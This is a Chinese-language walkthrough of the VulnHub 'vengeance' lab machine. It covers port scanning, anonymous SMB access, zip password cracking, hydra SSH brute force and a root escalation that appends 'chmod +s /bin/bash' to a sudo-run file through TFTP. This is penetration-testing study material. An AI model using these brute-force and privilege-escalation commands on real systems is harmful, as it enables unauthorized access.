vulnhub靶场之【digitalworld.local系列】的vengeance靶机

前言

靶机:digitalworld.local-vengeance,IP地址为192.168.10.10

攻击:kali,IP地址为192.168.10.6

kali采用VMware虚拟机,靶机选择使用VMware打开文件,都选择桥接网络

这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware直接加载,也给出了iso镜像文件。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过网盘下载 https://pan.quark.cn/s/86cf8a398835

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

信息收集

使用nmap扫描端口

扫描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.10 --min-rate=1000 -p- -oA nmap-tcp

扫描常见的20个udp端口,不过这里的端口明显处于open的很少

nmap -sU 192.168.10.10 --top-ports 20 -T4 -oA nmap-udp

把前面扫描出的tcp端口,进行处理,只取端口号

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
#这里就是包括可能开放的端口都不要,因为是靶机,可能过滤的话,也会无法进一步扫描
ports=80,180,110,113,139,143,443,445,993,995,22222

对特定的端口号进行深入探测

nmap -sV -O -sC -sT 192.168.10.10 -p $ports -oA detail

6

使用脚本检测有无漏洞

nmap --script=vuln 192.168.10.10 -p $ports -oA vuln

8

smb探测

使用nmap的脚本进行测试,不过脚本并没有启动成功

nmap --script=smb* 192.168.10.10

使用enum4linux进行枚举,发现内容

10

尝试使用smbclient连接,最终以匿名身份连接到sarapublic分享时,发现内容

smbclient //192.168.10.10/sarapublic$ -N

然后把所以数据下载

smb: \> prompt
smb: \> recurse
smb: \> mget *

这个似乎是工作目录,查看essay.txt,发现其中的信息,包括产品,以及两个人名qinyi、govindasamy

查看profile.txt文件,发现一个人名giovanni

尝试解压gio.zip,发现需要密码

尝试使用fcrackzip进行爆破,发现字典rockyou.txt也没获取密码

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt gio.zip

查看champagne目录,看到一个网站的目录,猜测这个可能是网站的备份文件之类的

网站探测

访问80端口的网站

结合前面nmap的扫描,应该是一个wordpress的CMS,这个界面,估计是靶机需要绑定域名

点击一个链接,发现是跳转到一个域名vengeance.goodtech.inc,这个域名就是需要进行绑定的

windowslinux中绑定域名,需要编辑hosts文件,只是文件的位置不同

linux 在 /etc/hosts文件
windos在 C:\Windows\System32\Drivers\etc\hosts文件

绑定后即可正常访问了

使用whatweb探测网站信息

whatweb http://192.168.10.10

使用浏览器的插件wappalyzer查看网站相关使用

使用针对wordpress这个CMS的专门工具wpscan

wpscan --url http://vengeance.goodtech.inc -e u

获取到wordpress的版本信息5.6.1

枚举到三个用户qinyi、sara、qiu

尝试进行爆破密码,但是这里未找到接口,大概率是目录名称更换了,所以采用目录爆破一下

使用gobuster进行爆破,也是没有好的数据

gobuster dir -u http://192.168.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.bak,.txt,s,.,.html -b 403-404

仔细的去看看这个网站,发现这个网站是用户qinyi的博客,记录了她的一些事件

访问其中一个文章,发现一个需要密码的界面

唉,这个网站中还有一些其他文章,可以去自己看看,评论也有。爱情啊

但是到这里又断了

压缩包破解

之前在smb获取的信息,应该有大用才对,回去继续测试

尝试从80端口的网站使用cewl获取单词,但是,获取到的东西并不能破解。

那么既然压缩包gio.zip中,有一些其他的txt文件,那么是否这里面的单词有可能会有密码

grep -oE '\w+' blurb.txt| sort | uniq > pass.txt
grep -oE '\w+' eaurouge | sort | uniq >> pass.txt
grep -oE '\w+' eaurouge.txt| sort | uniq >> pass.txt
grep -oE '\w+' essay.txt| sort | uniq >> pass.txt
grep -oE '\w+' profile.txt| sort | uniq >> pass.txt

然后使用fcrackzip进行破解

fcrackzip -u -D -p pass.txt gio.zip

获取到密码nanotechnological

到了这里我变得很敏感了,查看文件pass_reminder.txt,发现字段

查看pptx文件,五张幻灯片,有很多文字

我现在把ppt中的文字都放在一个文件中,并通过grep等命令分割单词,然后作为字典

这里做成的字典,可以作为网站的密码破解,或者是对ssh登录进行爆破

ssh爆破

之前使用wpscan或者smb枚举时,有些用户的,把这些用户放在一个文件中

hydra 192.168.10.10 -L user.txt -P pass.txt ssh -s 22222

但是爆破后,并没有反应,突然想到解压后的一个文件名pass_reminder,密码提醒

文件内容,是密码构成

name	---->名称
corner	---->拐角,角
circuit	---->电路

再次查看ppt,毕竟图片没有内容了,这个ppt的作者名称Giovanni Berlusconi

另一种ppt,说的是corner,就是角

搜索一下这个图片的出处,因为这里说了最喜欢的弯道,但是没给出具体名称

ok,知道了,就构造密码

name 	--->Giovanni Berlusconi
corner	--->130R
circuit	--->Suzuka

编写一个bash脚本即可

for name in giovanni berlusconi Giovanni Berlusconi "Giovanni Berlusconi"; doprintf "%s_130R_Suzuka\n" "$name"
done > pass.txt

使用hydra进行爆破

hydra 192.168.10.10 -L user.txt -P pass.txt ssh -s 22222

以这个账户密码giovanni_130R_Suzuka连接ssh

ssh qinyi@192.168.10.10 -p 22222

靶机内信息收集

登录qinyi的账户后,查看当前目录下的提示

这里看到有sara、patrick两个人名,并且可能有些东西修改了,有些还没来得及

查看有哪些用户

ls -alh /home
cat /etc/passwd | grep /bin/bash

收集内核版本和系统版本

uname -a/-r
cat /etc/issue
cat /etc/*release
lsb_release

查看其他用户具有写权限的文件,发现并没有

find / -type f -perm /o+w 2>/dev/null | grep -v /sys | grep -v /proc

获取以root执行的进程

ps aux | grep root

查看连接状态等信息,没什么值得关注

ip add
ss -antlp
netstat -antlp

查看定时任务

crontab -l
cat /etc/crontab
atq

上传pspy64,然后进行测试,看有无隐藏执行的进程

kali中执行scp上传到靶机

scp -P 22222 ./pspy64 qinyi@192.168.10.10:/tmp

不过执行后,还是没有东西

再通过kaliscp上传linpeas.sh

scp -P 22222 ./linpeas.sh qinyi@192.168.10.10:/tmp

东西太多,大致都差不多

使用find寻找具有SUID权限的文件

find / -perm -4000 -print 2>/dev/null

使用sudo -l查看

虽然nginx可以重启,但是前面寻找可以编辑的文件时,nginx的配置文件并不能修改,那么就无作用

另一个是在/home/sara目录,也就是sara用户的家目录下

查看文件夹,没有权限去查看或执行

提权

我这里测试很久,并没有找到方式,内核也测试过了

网上看了一下wp,啧,我真的蠢死

这里就是端口的问题了,但是我只看了tcp端口,udp端口没看,导致错过关键信息

netstat -antulp
ss -antulp

查看的网络连接状态,其实tcp端口基本上都是nmap扫描出的

对于udp即使扫描出了,我也没怎么关注,所以这是错误的

对扫描的结果进行处理,保留端口号

ss -antulp | grep udp | awk -F ':' '{print $2}' | awk -F ' ' '{print $1}'| uniq | paste -sd ','

然后在kali中,再次对这些端口进行扫描

nmap -sV -sU 192.168.10.10 -p53,68,69,137,138

这几个里面,可能只有tftp是有用的,因为这个就是和ftp是一样的,直接连接测试,是否被过滤或者说被拦截

tftp 192.168.10.10 69

可以连接成功,但是并不知道路径,连接后,也不能使用pwd

并且put上传文件后,在靶机使用find也无法找到上传的文件的去向

使用lsof测试tftp

lsof | tftp 

这里知道,是通过apt安装的tftp,那么就可以搜索apt安装tftp的默认配置文件等情况

查看这个配置文件,确定靶机的tftp的根目录是什么

哈哈哈哈哈哈哈哈哈,与sudo的一个文件一样,并且用户名是root。那么直接尝试进行get,下载后查看这个文件

直接在文件后面添加代码,以最简单的

chmod +s /bin/bash

再次把这个文件上传,不过名称一定要一样,不要修改,直接put

可以看到/bin/bash已经有了SUID权限

直接提权

/bin/bash -p

总结

这个靶机其实主要就是密码的猜测

该靶机值得反思以下几点:

  1. 对于网站,并非一定是突破口
  2. smb匿名登录获取分享中的数据,主要就是围绕一个压缩包,其中的txt文件都是作为其密码的根据,这个我没想到,网站我想到了,但是这个是真的没想到,所以思维要广
  3. 对于压缩包的破解后,获取到的文件,一定有用的,所以不要放弃,这里是给出了提示,所以排列组合少了很多,若没有提示呢,啧
  4. 靶机内的信息收集一定要全面,我这里忽略了udp端口在靶机的监听状态,导致漏掉了tftp
  5. 提权,这里还是sudo,主要就是发现tftp,以及tftp的根目录,不然这个靶机也是无法提权的

其实,到最后,我好奇的还是网站的哪个需要密码的东西,到底是什么,我后面会去观看的

最终还是通过数据库找到了,密码没找到

原来这是感情经历,怪不得密码封印

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/31080.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

纯html文件实现目录和文档关联

目录结构 效果图 代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><title>项目结题报告</title><style lang"scss">::-webkit-scrollbar {width: 6px;height: 6px;}::-webkit-scro…

计算机网络——交换机

一、什么是交换机&#xff1f; 交换机&#xff08;Switch&#xff09;是局域网&#xff08;LAN&#xff09;中的核心设备&#xff0c;负责在 数据链路层&#xff08;OSI第二层&#xff09;高效转发数据帧。它像一位“智能交通警察”&#xff0c;根据设备的 MAC地址 精准引导数…

Primer - 自适应学习,AI学习工具

android Primer - 自适应学习 链接&#xff1a;https://pan.xunlei.com/s/VOKv1kIghHXGSbjg3PIZnhWHA1?pwdwfn6# 【软件说明】&#xff1a;采用先进的自适应学习算法&#xff0c;能够迅速识别您当前的知识水平&#xff0c;并推荐新的学习主题。经过初步评估后&#xff0c;您…

【Vue3 Element UI - Plus + Tyscript 实现Tags标签输入及回显】

Vue3 Element Plus TypeScript 实现 Tags 标签输入及回显 在开发后台管理系统或表单页面时&#xff0c;动态标签&#xff08;Tags&#xff09; 是一个常见的功能需求。用户可以通过输入框添加标签&#xff0c;并通过关闭按钮删除标签&#xff0c;同时还需要支持标签数据的提…

程序员学习强化学习之基本概念的数学表达

基本概念 迷宫游戏为例 状态(State)&#xff1a;S {s1, . . . , s9} 行动(Action)&#xff1a;A {a1, . . . , a5} 状态转移(State transition)&#xff1a; 奖励(Reward)&#xff1a;r(s, a) 是 s和a的函数 序列(Trajectories) 策略1的序列&#xff1a; 策略2的序列&…

达梦数据库查看字符集编码

select SF_GET_UNICODE_FLAG(); 返回 0 代表数据库字符集编码为 GB18030 1 代表数据库字符集编码为 UTF-8 2 代表数据库字符集编码为韩文字符集 EUC-KR

【数据结构与算法】Java描述:第二节:LinkedList 链表

一、链表的概念与结构 1.1 概念&#xff1a; 通俗的来说&#xff0c;链表是由一个个结点连接起来的就叫链表。 1.2 结构&#xff1a; 链表存储的数据 在 物理上是不一定连续的&#xff0c;它是由前面链接后面&#xff0c;一个个连起来的。 二、Java底层的 LinkedList 2.1…

[Java基础-线程篇]7_线程设计模式与总结

摘要&#xff1a;懒汉单例模式怎么变得线程安全&#xff1f;Master-Worker归并模式&#xff0c;工作窃取算法。Java线程相关源码使用了什么设计模式&#xff1f; 资料引用&#xff1a;《Java高并发核心编程卷2》 目录 线程安全的单例模式 Master-Worker模式 工作窃取算法 …

RabbitMQ高级特性--消息确认机制

目录 一、消息确认 1.消息确认机制 2.手动确认方法 二、代码示例 1. AcknowledgeMode.NONE 1.1 配置文件 1.2 生产者 1.3 消费者 1.4 运行程序 2.AcknowledgeMode.AUTO 3.AcknowledgeMode.MANUAL 一、消息确认 1.消息确认机制 生产者发送消息之后&#xff0c;到达消…

NodeJS学习笔记

NodeJS软件安装 node环境安装&#xff1a; https://nodejs.org 安装好后的node通常在C:\Program Files\nodejs验证安装是否成功 node -v npm -v 进入REPL模式命令行模式 nodeNodeJS在REPL模式和编辑器使用 windos在dos下常用命令 windos命令&#xff1a; 1、cmd dos系统2、…

Unity 实现在模型表面进行绘画

Texture2D-SetPixels32 - Unity 脚本 API 实现思路 从笔尖位置发射射线获取画纸上碰撞位置的UV 纹理坐标以确认笔迹位置&#xff0c;射线检查碰撞的最大距离即笔尖距离画纸的最大距离&#xff0c;利用Texture2D.SetPixels32 实现对画纸贴图颜色的修改。 核心代码 发射一条以…

2008-2024年中国手机基站数据/中国移动通信基站数据

2008-2024年中国手机基站数据/中国移动通信基站数据 1、时间&#xff1a;2008-2024年 2、来源&#xff1a;OpenCelliD 3、指标&#xff1a;网络类型、网络代数、移动国家/地区、移动网络代码、区域代码、小区标识、单元标识、坐标经度、坐标纬度、覆盖范围、测量样本数、坐标…

LeetCode Hot100刷题——反转链表(迭代+递归)

206.反转链表 给你单链表的头节点 head &#xff0c;请你反转链表&#xff0c;并返回反转后的链表。 示例 1&#xff1a; 输入&#xff1a;head [1,2,3,4,5] 输出&#xff1a;[5,4,3,2,1]示例 2&#xff1a; 输入&#xff1a;head [1,2] 输出&#xff1a;[2,1]示例 3&#…

Android项目优化同步速度

最近项目需要使用ffmpeg&#xff0c;需要gradle配置引入ffmpeg库&#xff0c;发现原来通过google官方的代码仓&#xff0c;下载太慢了&#xff0c;每秒KB级别的速度。&#xff08;之前下gradle/gradle plugin都不至于这么慢&#xff09;&#xff0c;于是想到配置国内镜像源来提…

Upload-Labs-Linux 1-20

前端校验绕过&#xff1a;pass 01 两种思路&#xff1a;1.通过抓包&#xff0c;修改后缀 2.前端禁用js绕过前端后缀检验 首先写一个木马&#xff0c;改为图片格式GIF89a<?php eval($_POST[cmd])?>抓包之后改为PHP格式&#xff1a; 使用蚁剑连接木马&#xff0c;第一次尝…

爬虫案例九js逆向爬取CBA中国篮球网

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、CBA网站分析二、代码 前言 提示&#xff1a;这里可以添加本文要记录的大概内容&#xff1a; 爬取CBA中国篮球网 提示&#xff1a;以下是本篇文章正文内容…

江科大51单片机笔记【10】蜂鸣器(上)

一、蜂鸣器 1.原理 蜂鸣器是一种将电信号转换为声音信号的器件&#xff0c;常同来产生设备的按键音、报警音等提示信号蜂鸣器按驱动方式可分为有源蜂鸣器和无源蜂鸣器&#xff08;外观基本一样&#xff09;有源蜂鸣器&#xff1a;内部自带振荡源&#xff0c;将正负极接上直流…

VS Code连接服务器教程

VS Code是什么 VS Code&#xff08;全称 Visual Studio Code&#xff09;是一款由微软推出的免费、开源、跨平台的代码编辑神器。VS Code 支持 所有主流操作系统&#xff0c;拥有强大的功能和灵活的扩展性。 官网&#xff1a;https://code.visualstudio.com/插件市场&#xff1…

使用QT + 文件IO + 鼠标拖拽事件 + 线程 ,实现大文件的传输

第一题、使用qss&#xff0c;通过线程&#xff0c;使进度条自己动起来 mythread.h #ifndef MYTHREAD_H #define MYTHREAD_H#include <QObject> #include <QThread> #include <QDebug>class mythread : public QThread {Q_OBJECT public:mythread(QObject* …

本地搭建DeepSeek R1模型 + 前端

本地搭建DeepSeek R1模型 前端 配置&#xff1a; 操作系统&#xff1a;windows11 CPU&#xff1a;i5 13600KF GPU&#xff1a;英伟达4070 12GB 内存&#xff1a;16G DDR5 硬盘&#xff1a;1TB 模型安装 本文采用Ollama进行安装。Ollama安装比较简单。 官网&#xff1…